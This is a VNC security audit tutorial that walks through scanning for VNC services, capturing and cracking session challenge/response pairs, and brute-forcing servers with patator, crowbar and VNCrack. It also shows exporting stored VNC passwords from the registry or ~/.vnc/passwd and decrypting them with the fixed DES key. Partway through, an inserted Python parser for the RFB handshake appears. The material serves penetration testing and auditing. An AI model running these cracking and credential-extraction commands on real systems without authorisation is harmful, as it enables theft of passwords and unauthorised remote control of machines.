VNC Security Audit
By default, RFB (the Remote Framebuffer protocol used by VNC) uses TCP ports 5900 to 5906. Each port corresponds to an X server display: ports 5900 to 5906 map to displays :0 to :6.
Java Viewer and HTTP VNC use port 5800.
The VNC viewer (client) in Listening mode listens on port 5500.
To scan a network in search of VNC servers and clients in listening mode:
sudo nmap -p 5500,5800,5900-5906 --open NETWORK
sudo nmap -p 5500,5800,5900-5906 --open 192.168.43.0/24
VNC sessions can be captured, for example, during man-in-the-middle attacks.
To retrieve the challenge and response of the VNC session, you can use Ettercap:
ettercap -Tq -r FILE.pcapng
Using Wireshark Filters, you can conduct a detailed analysis of the VNC session:
To show only VNC session traffic:
The result of an authentication attempt on the VNC server:
The challenge, response, and result of an authentication attempt on a VNC server:
vnc.auth_challenge or vnc.auth_response or vnc.auth_result
Computer Name with VNC Server:
Mouse button position:
vnc.button_1_pos, vnc.button_2_pos, … vnc.button_8_pos
Security Type Selected:
VNC client protocol version:
VNC server protocol version:
Data of transmitted video in H.264 format:
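To make the fields behind those filters concrete, here is an added Python example (not from the original article) that parses one RFB 3.8 connection setup, the same version strings, security-type selection, 16-byte challenge/response and authentication result that Wireshark exposes, from a constructed, merged transcript of both directions; it reuses the challenge and response values quoted later on this page and ends in a rejected login, which is what a defender counts when looking for brute-force attempts.

```python
import struct

# RFB 3.8 security-type numbers (RFC 6143, section 7.1.2) and SecurityResult codes
SECURITY_TYPES = {0: "Invalid", 1: "None", 2: "VNC Authentication"}
AUTH_RESULT = {0: "OK", 1: "failed"}


def parse_rfb_handshake(stream: bytes) -> dict:
    """Parse one RFB 3.8 connection setup from a merged, in-order transcript of
    both directions: version strings, security-type negotiation, the 16-byte
    challenge/response of VNC Authentication and the final SecurityResult."""
    fields, off = {}, 0
    fields["server_version"] = stream[off:off + 12].decode("ascii").strip(); off += 12
    fields["client_version"] = stream[off:off + 12].decode("ascii").strip(); off += 12
    count = stream[off]; off += 1
    offered = stream[off:off + count]; off += count
    fields["security_types_offered"] = [SECURITY_TYPES.get(t, str(t)) for t in offered]
    chosen = stream[off]; off += 1
    fields["security_type_selected"] = SECURITY_TYPES.get(chosen, str(chosen))
    if chosen == 2:  # VNC Authentication: DES challenge/response, 16 bytes each way
        fields["auth_challenge"] = stream[off:off + 16].hex(); off += 16
        fields["auth_response"] = stream[off:off + 16].hex(); off += 16
    (result,) = struct.unpack(">I", stream[off:off + 4]); off += 4
    fields["auth_result"] = AUTH_RESULT.get(result, str(result))
    if result != 0:  # on failure RFB 3.8 appends a reason string: u32 length + text
        (rlen,) = struct.unpack(">I", stream[off:off + 4]); off += 4
        fields["auth_reason"] = stream[off:off + rlen].decode("ascii", "replace"); off += rlen
    fields["bytes_consumed"] = off
    return fields


def build_sample() -> bytes:
    """Constructed transcript (not a real capture) of one rejected login; the
    challenge and response values are the ones quoted in the article."""
    reason = b"Authentication failure"
    return (b"RFB 003.008\n" + b"RFB 003.008\n"
            + bytes([2, 1, 2])                                   # server offers None and VNC Authentication
            + bytes([2])                                         # client selects VNC Authentication
            + bytes.fromhex("894443629f4a9675809cff5da2e84651")  # server challenge
            + bytes.fromhex("271d94eb610b5c42588dc53506419e6a")  # client response
            + struct.pack(">I", 1)                               # SecurityResult: failed
            + struct.pack(">I", len(reason)) + reason)


if __name__ == "__main__":
    for key, value in parse_rfb_handshake(build_sample()).items():
        print(f"{key}: {value}")
```

Feed the function the reassembled TCP payloads of a real session (server and client bytes merged in arrival order) to get the same values the vnc.auth_challenge, vnc.auth_response and vnc.auth_result filters show.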
You can use different methods to crack a VNC password:
- VNC session password cracking
- Decryption of the saved VNC server password
- Brute-force VNC server password
From the captured VNC session traffic, you need to extract the authentication challenge and the authentication response. This method requires a bit more preparation, but it lets you use the power of Hashcat (the fastest offline brute-forcer). A detailed tutorial can be found in the article “How to crack VNC password from captured traffic (challenge response)”.
If you do not want to deal with the method described for Hashcat, then use the VNCrack program.
How to install VNCrack
Installation on Kali Linux
wget http://www.phenoelit.org/vncrack/vncrack_s.gz
gunzip vncrack_s.gz
chmod +x vncrack_s
./vncrack_s
Installation in BlackArch
sudo pacman -S vncrack
Installation in Windows
Download the file http://www.phenoelit.org/vncrack/x4.exe and run it on the command line. See also “How to set up the PowerShell environment on Windows and Linux”.
To crack with VNCrack, you only need to specify the challenge, the response and the dictionary file. For example, to crack the password of an intercepted VNC session containing the challenge (-c 894443629f4a9675809cff5da2e84651) and the response (-r 271d94eb610b5c42588dc53506419e6a) using a dictionary attack (-w passwords.txt):
vncrack -c 894443629f4a9675809cff5da2e84651 -r 271d94eb610b5c42588dc53506419e6a -w passwords.txt
Let's consider programs for online brute-forcing of VNC server passwords.
VNC servers reject connections after several unsuccessful attempts, so a VNC brute-force needs to run in a single thread with a large interval between requests.
patator is one of the most versatile and flexible brute force software.
In the following example, the wait time between requests is set to 61 seconds:
patator vnc_login host=192.168.43.250 password=FILE0 0=passwords.txt -t 1 -x quit:code=0 -x ignore:fgrep='authentication rejected' -x ignore:fgrep='Authentication failure' --rate-limit=61
Examples of errors when the server rejected your connection without password verification:
- Session setup failed: "Your connection has been rejected.
- password check failed!
As you can see in the following screenshots, despite a long brute-force time and a couple of error messages, the passwords on the two VNC servers were cracked:
Crowbar (formerly known as Levye) is a brute force tool that can be used during penetration tests. It is designed to support protocols that are not currently supported by THC-Hydra and other popular brute force tools.
How to install crowbar
Installation on Kali Linux
sudo apt install crowbar freerdp2-x11 openvpn nmap
Installation in BlackArch
sudo pacman -S crowbar freerdp openvpn nmap
An example of a brute-force VNC service on a single host (-s 192.168.86.61/32) with a password dictionary (-C /root/words.txt) in 1 thread (-n 1):
crowbar -b vnckey -s 192.168.86.61/32 -C /root/words.txt -n 1
The installation of VNCrack was described above.
Brute Force Launch Example:
vncrack -h 192.168.43.250 -w passwords.txt
The VNC server stores the password on the computer in encoded form, and there are several ways to extract it. Let's consider the programs and methods for decrypting a saved VNC server password.
VNCPassView is a small utility for recovering passwords stored by VNC tools.
VNC passwords in Windows are stored in the registry in the following branches (the list may be incomplete):
The password is stored in binary form, its length is 8 bytes.
To read the password from the registry, you can use the commands to save registry fragments to .reg files, for example:
regedit.exe /E winvnc3.reg "HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3\"
regedit.exe /E winvnc4.reg "HKEY_LOCAL_MACHINE\Software\RealVNC\WinVNC4\"
VNCrack can also decode the stored password; to do this, run the program in interactive mode:
Then enter the password bytes, two bytes per line, for example like this:
14 cc ac 84 2f 6f 8d 0d
As a result, all entered bytes and the decoded password will be displayed:
Entered HEX String: 14 cc ac 84 2f 6f 8d d
VNC Password: 222222
On Linux, passwords can be stored anywhere, but the default file is ~/.vnc/passwd. To view it, open it with any editor capable of displaying hexadecimal data:
On Linux, you can also use VNCrack for this:
vncrack -C ~/.vnc/passwd
Recovering the VNC server password stored in the ~/.vnc/passwd file:
Alternatively, you can use the method described by Bill Chaison: https://github.com/billchaison/VNCDecrypt. It decrypts the stored bytes with the fixed DES key that VNC uses for password obfuscation; just run a command of the following form:
echo -n PASSWORD_BYTES | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
echo -n F0E43164F6C2E373 | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
NSE listing page (Nmap scripts): https://nmap.org/nsedoc/. The following VNC-related scripts are present on it:
- realvnc-auth-bypass: Checks if a VNC server is vulnerable to the RealVNC authentication bypass (CVE-2006-2369).
- vnc-brute: Performs brute force password auditing against VNC servers.
- vnc-info: Queries a VNC server for its protocol version and supported security types.
- vnc-title: Tries to log into a VNC server and get its desktop name. Uses credentials discovered by vnc-brute, or the None authentication type. If realvnc-auth-bypass was run and returned VULNERABLE, this script will use that vulnerability to bypass authentication.
To run them, use the --script option followed by one script name, or several separated by commas:
sudo nmap -p 5500,5800,5900-5906 --script realvnc-auth-bypass,vnc-brute,vnc-info,vnc-title HOST_OR_NETWORK
You can also use all the scripts as follows:
sudo nmap -p 5500,5800,5900-5906 --script 'vnc-*' HOST_OR_NETWORK
[WILL BE ADDED LATER]